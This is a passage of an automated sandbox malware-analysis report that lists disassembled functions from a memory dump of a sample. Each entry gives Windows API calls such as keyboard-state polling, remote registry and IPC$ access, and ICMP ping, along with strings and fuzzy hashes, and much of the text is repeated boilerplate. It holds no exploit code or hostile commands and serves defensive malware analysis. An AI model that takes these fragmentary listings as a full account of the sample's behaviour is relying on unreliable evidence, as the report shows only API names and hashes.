                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                      • String ID: BUTTON
                                                      • API String ID: 1194449130-3405671355
                                                      • Opcode ID: cb48c18e25285675b47dd45213e4df599fc26db77d5b3587f65564511eb74a61
                                                      • Instruction ID: 8057e7578c4878f1a34ff3686e3b1f178a491c479aac76e5ea0b4356b4cd103d
                                                      • Opcode Fuzzy Hash: cb48c18e25285675b47dd45213e4df599fc26db77d5b3587f65564511eb74a61
                                                      • Instruction Fuzzy Hash: 80215BB420020CAFEB106F20ECCAE7A3B6EBB54B58B140525F515C21B1DBB5AC00FF64
                                                      Function 00F8E9FC Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00F29CB3: _wcslen.LIBCMT ref: 00F29CBD
                                                      • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00F8EA5D
                                                      • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00F8EA73
                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F8EA84
                                                      • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00F8EA96
                                                      • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00F8EAA7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: SendString$_wcslen
                                                      • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                      • API String ID: 2420728520-1007645807
                                                      • Opcode ID: 98242d5dedb8af22ddbec2681fdf26481fffdbdc671fd98d1e1c7d0f6ffcd8dd
                                                      • Instruction ID: fbe6449210141b4ffb8b8993174bde00b49a116231d81f2ed0caac7853b91a25
                                                      • Opcode Fuzzy Hash: 98242d5dedb8af22ddbec2681fdf26481fffdbdc671fd98d1e1c7d0f6ffcd8dd
                                                      • Instruction Fuzzy Hash: A3118231A5026D79D724E762DC4ADFF7A7CEBD1F50F000425B401E20D1DAB45A45E6B1
                                                      Function 00F85CC6 Relevance: 18.2, APIs: 12, Instructions: 173COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetDlgItem.USER32(?,00000001), ref: 00F85CE2
                                                      • GetWindowRect.USER32(00000000,?), ref: 00F85CFB
                                                      • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00F85D59
                                                      • GetDlgItem.USER32(?,00000002), ref: 00F85D69
                                                      • GetWindowRect.USER32(00000000,?), ref: 00F85D7B
                                                      • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00F85DCF
                                                      • GetDlgItem.USER32(?,000003E9), ref: 00F85DDD
                                                      • GetWindowRect.USER32(00000000,?), ref: 00F85DEF
                                                      • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00F85E31
                                                      • GetDlgItem.USER32(?,000003EA), ref: 00F85E44
                                                      • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00F85E5A
                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00F85E67
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Window$ItemMoveRect$Invalidate
                                                      • String ID:
                                                      • API String ID: 3096461208-0
                                                      • Opcode ID: df3f9cacaf7b729c99d35841e626211d6d3100fc938209270263e41abf772025
                                                      • Instruction ID: 9f2ee135cbff54065629311d28312bf5a5956925182d7f46ff6b6bb9f9e94523
                                                      • Opcode Fuzzy Hash: df3f9cacaf7b729c99d35841e626211d6d3100fc938209270263e41abf772025
                                                      • Instruction Fuzzy Hash: B3510F71E00609AFDF18DF68DD89AAE7BB5AB48710F148229F915E7290D7709D04DB50
                                                      Function 00F38BCD Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00F38F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00F38BE8,?,00000000,?,?,?,?,00F38BBA,00000000,?), ref: 00F38FC5
                                                      • DestroyWindow.USER32(?), ref: 00F38C81
                                                      • KillTimer.USER32(00000000,?,?,?,?,00F38BBA,00000000,?), ref: 00F38D1B
                                                      • DestroyAcceleratorTable.USER32(00000000), ref: 00F76973
                                                      • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00F38BBA,00000000,?), ref: 00F769A1
                                                      • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00F38BBA,00000000,?), ref: 00F769B8
                                                      • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00F38BBA,00000000), ref: 00F769D4
                                                      • DeleteObject.GDI32(00000000), ref: 00F769E6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                      • String ID:
                                                      • API String ID: 641708696-0
                                                      • Opcode ID: cfc86abdb6f1db4041c6472c5a9c6b017f0787a72e6775e71ed94e3a21241f37
                                                      • Instruction ID: 18f27b1a7065ffab4f53fe66c79264d717e2f3ba409ef5c8d844f6a2bd8115f6
                                                      • Opcode Fuzzy Hash: cfc86abdb6f1db4041c6472c5a9c6b017f0787a72e6775e71ed94e3a21241f37
                                                      • Instruction Fuzzy Hash: AA61AB31902B08DFDB359F24CA48B2677B1FF403B2F149519E04697560CB79A882FFA1
                                                      Function 00F39838 Relevance: 18.1, APIs: 12, Instructions: 137COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00F39944: GetWindowLongW.USER32(?,000000EB), ref: 00F39952
                                                      • GetSysColor.USER32(0000000F), ref: 00F39862
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: ColorLongWindow
                                                      • String ID:
                                                      • API String ID: 259745315-0
                                                      • Opcode ID: c29b0c7062656c041d77f60d690bfbb313b8ed6d6cc976abdda92410146ede4c
                                                      • Instruction ID: 1e3501592cb0695f64c0f6f7f0bd30f2a9439fa1f1dd7ecfbf9666e5573277b1
                                                      • Opcode Fuzzy Hash: c29b0c7062656c041d77f60d690bfbb313b8ed6d6cc976abdda92410146ede4c
                                                      • Instruction Fuzzy Hash: E841C131508644AFDB209F3C9C84BBA3BA5AB46330F584605F9A6972E1C7F19C41FF61
                                                      Function 00F896E2 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,00F6F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00F89717
                                                      • LoadStringW.USER32(00000000,?,00F6F7F8,00000001), ref: 00F89720
                                                        • Part of subcall function 00F29CB3: _wcslen.LIBCMT ref: 00F29CBD
                                                      • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00F6F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00F89742
                                                      • LoadStringW.USER32(00000000,?,00F6F7F8,00000001), ref: 00F89745
                                                      • MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00F89866
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: HandleLoadModuleString$Message_wcslen
                                                      • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                      • API String ID: 747408836-2268648507
                                                      • Opcode ID: 0a42ed5e1fab84b693b619c573b69a9cfa162a6cc606e628aa87dd55ef1434ff
                                                      • Instruction ID: 6d40f284321dd0aa53cf68c2b388243228760e5044ed88313dfff7dd7270235b
                                                      • Opcode Fuzzy Hash: 0a42ed5e1fab84b693b619c573b69a9cfa162a6cc606e628aa87dd55ef1434ff
                                                      • Instruction Fuzzy Hash: D241307280422DAACF04FBE0ED96DEE7778AF54340F540425F505B2092EB796F48EB61
                                                      Function 00F806DE Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00F26B57: _wcslen.LIBCMT ref: 00F26B6A
                                                      • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00F807A2
                                                      • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00F807BE
                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00F807DA
                                                      • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00F80804
                                                      • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 00F8082C
                                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00F80837
                                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00F8083C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                      • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                      • API String ID: 323675364-22481851
                                                      • Opcode ID: dd5a8c9301f956e08588b567a59563d4c2d4b4c21129e13f83ea7a7c3dde7732
                                                      • Instruction ID: 13acff9438c10faa60e6d5321a94643550bc92460027e3ea3fc7e093f11fb888
                                                      • Opcode Fuzzy Hash: dd5a8c9301f956e08588b567a59563d4c2d4b4c21129e13f83ea7a7c3dde7732
                                                      • Instruction Fuzzy Hash: B5410672C1022DABDF15EBA4EC958EEB778BF04750F444129F901A7161EB749E48EFA0
                                                      Function 00FA3C30 Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • VariantInit.OLEAUT32(?), ref: 00FA3C5C
                                                      • CoInitialize.OLE32(00000000), ref: 00FA3C8A
                                                      • CoUninitialize.OLE32 ref: 00FA3C94
                                                      • _wcslen.LIBCMT ref: 00FA3D2D
                                                      • GetRunningObjectTable.OLE32(00000000,?), ref: 00FA3DB1
                                                      • SetErrorMode.KERNEL32(00000001,00000029), ref: 00FA3ED5
                                                      • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00FA3F0E
                                                      • CoGetObject.OLE32(?,00000000,00FBFB98,?), ref: 00FA3F2D
                                                      • SetErrorMode.KERNEL32(00000000), ref: 00FA3F40
                                                      • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00FA3FC4
                                                      • VariantClear.OLEAUT32(?), ref: 00FA3FD8
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                      • String ID:
                                                      • API String ID: 429561992-0
                                                      • Opcode ID: 79a1e147e3d099fa0f71a5c10ff50d87db63836789857cabf2915e61cf1d885d
                                                      • Instruction ID: 7195ef24c0b76b159529423db29c9e34c1cbef453b525c7129b9a23b3bf0d6ce
                                                      • Opcode Fuzzy Hash: 79a1e147e3d099fa0f71a5c10ff50d87db63836789857cabf2915e61cf1d885d
                                                      • Instruction Fuzzy Hash: F0C146B1A083059FD700DF68C88492BB7E9FF8A754F14491DF98A9B251DB30EE05DB92
                                                      Function 00F97A96 Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CoInitialize.OLE32(00000000), ref: 00F97AF3
                                                      • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00F97B8F
                                                      • SHGetDesktopFolder.SHELL32(?), ref: 00F97BA3
                                                      • CoCreateInstance.OLE32(00FBFD08,00000000,00000001,00FE6E6C,?), ref: 00F97BEF
                                                      • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00F97C74
                                                      • CoTaskMemFree.OLE32(?,?), ref: 00F97CCC
                                                      • SHBrowseForFolderW.SHELL32(?), ref: 00F97D57
                                                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00F97D7A
                                                      • CoTaskMemFree.OLE32(00000000), ref: 00F97D81
                                                      • CoTaskMemFree.OLE32(00000000), ref: 00F97DD6
                                                      • CoUninitialize.OLE32 ref: 00F97DDC
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                      • String ID:
                                                      • API String ID: 2762341140-0
                                                      • Opcode ID: 9e9600778a81ecad5c4831bcbb3dfed7af8b27f17c848bdb80bee1a093b8b4bd
                                                      • Instruction ID: b1a99fd262532169545f5cd2799824ae3d66d6baeaa23a4ea1475d1a6514e66b
                                                      • Opcode Fuzzy Hash: 9e9600778a81ecad5c4831bcbb3dfed7af8b27f17c848bdb80bee1a093b8b4bd
                                                      • Instruction Fuzzy Hash: 73C14975A04219AFDB14DFA4C884DAEBBF9FF48314B148199E81ADB261C730EE41DF90
                                                      Function 00FB541D Relevance: 16.7, APIs: 11, Instructions: 191windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00FB5504
                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00FB5515
                                                      • CharNextW.USER32(00000158), ref: 00FB5544
                                                      • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00FB5585
                                                      • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00FB559B
                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00FB55AC
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$CharNext
                                                      • String ID:
                                                      • API String ID: 1350042424-0
                                                      • Opcode ID: 6bac55024201c9e0f9f97d0bf453fe72933363b3ce314d3523e5d649c3d1cd7c
                                                      • Instruction ID: 828b0ce5f14e91421f1eb4fd5cdf44c402f850c9e42f1adb525a5eadbad4c8ce
                                                      • Opcode Fuzzy Hash: 6bac55024201c9e0f9f97d0bf453fe72933363b3ce314d3523e5d649c3d1cd7c
                                                      • Instruction Fuzzy Hash: 8C616B35900608EFDF20DF56CC84BFE7BB9EB09B25F144145F525AA290D7788A80EF60
                                                      Function 00F7FA88 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00F7FAAF
                                                      • SafeArrayAllocData.OLEAUT32(?), ref: 00F7FB08
                                                      • VariantInit.OLEAUT32(?), ref: 00F7FB1A
                                                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 00F7FB3A
                                                      • VariantCopy.OLEAUT32(?,?), ref: 00F7FB8D
                                                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 00F7FBA1
                                                      • VariantClear.OLEAUT32(?), ref: 00F7FBB6
                                                      • SafeArrayDestroyData.OLEAUT32(?), ref: 00F7FBC3
                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00F7FBCC
                                                      • VariantClear.OLEAUT32(?), ref: 00F7FBDE
                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00F7FBE9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                      • String ID:
                                                      • API String ID: 2706829360-0
                                                      • Opcode ID: 011bec13991f5a83073f892bce7a3ae880530a8a1c1f44655e8ba9aeae0874dd
                                                      • Instruction ID: 049ceb1407e726456666c7e30067d04d17ef66ecfab945c0381b30b7b0e51e1f
                                                      • Opcode Fuzzy Hash: 011bec13991f5a83073f892bce7a3ae880530a8a1c1f44655e8ba9aeae0874dd
                                                      • Instruction Fuzzy Hash: C1416535900219DFCF00DF68DC949AEBBB9FF48354F00C065E956A7261C734AA45DFA1
                                                      Function 00F89C79 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetKeyboardState.USER32(?), ref: 00F89CA1
                                                      • GetAsyncKeyState.USER32(000000A0), ref: 00F89D22
                                                      • GetKeyState.USER32(000000A0), ref: 00F89D3D
                                                      • GetAsyncKeyState.USER32(000000A1), ref: 00F89D57
                                                      • GetKeyState.USER32(000000A1), ref: 00F89D6C
                                                      • GetAsyncKeyState.USER32(00000011), ref: 00F89D84
                                                      • GetKeyState.USER32(00000011), ref: 00F89D96
                                                      • GetAsyncKeyState.USER32(00000012), ref: 00F89DAE
                                                      • GetKeyState.USER32(00000012), ref: 00F89DC0
                                                      • GetAsyncKeyState.USER32(0000005B), ref: 00F89DD8
                                                      • GetKeyState.USER32(0000005B), ref: 00F89DEA
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: State$Async$Keyboard
                                                      • String ID:
                                                      • API String ID: 541375521-0
                                                      • Opcode ID: 0ac6e8a1ab910a10052530d310524075abdb43ad5107a0e019feafb94cdf1e0a
                                                      • Instruction ID: b4732d1f4c1b8bcb8473f68a99b2b926ff8b59d9043650ac9b2949209b26bafc
                                                      • Opcode Fuzzy Hash: 0ac6e8a1ab910a10052530d310524075abdb43ad5107a0e019feafb94cdf1e0a
                                                      • Instruction Fuzzy Hash: CE41BA34E0C7CA6DFF31A760C8443F6BEA06B12364F0C805AD9C6565C1DBE559C4EBA5
                                                      Function 00FA055B Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • WSAStartup.WSOCK32(00000101,?), ref: 00FA05BC
                                                      • inet_addr.WSOCK32(?), ref: 00FA061C
                                                      • gethostbyname.WSOCK32(?), ref: 00FA0628
                                                      • IcmpCreateFile.IPHLPAPI ref: 00FA0636
                                                      • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00FA06C6
                                                      • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00FA06E5
                                                      • IcmpCloseHandle.IPHLPAPI(?), ref: 00FA07B9
                                                      • WSACleanup.WSOCK32 ref: 00FA07BF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                      • String ID: Ping
                                                      • API String ID: 1028309954-2246546115
                                                      • Opcode ID: 540ef12fc1c91379b4c92f6fea762b66a3b27ec60c468b30d1d0bfaf08f1b07a
                                                      • Instruction ID: 57a02fa6a38d7e3cbf17cbbf5f7452e25ab097db7e9853d726b4583a1286238a
                                                      • Opcode Fuzzy Hash: 540ef12fc1c91379b4c92f6fea762b66a3b27ec60c468b30d1d0bfaf08f1b07a
                                                      • Instruction Fuzzy Hash: 7991A1B59042019FD720CF15E889F1ABBE0AF45328F1885A9F4699B7A2CB34FC45DF91
                                                      Function 00FA8CD3 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
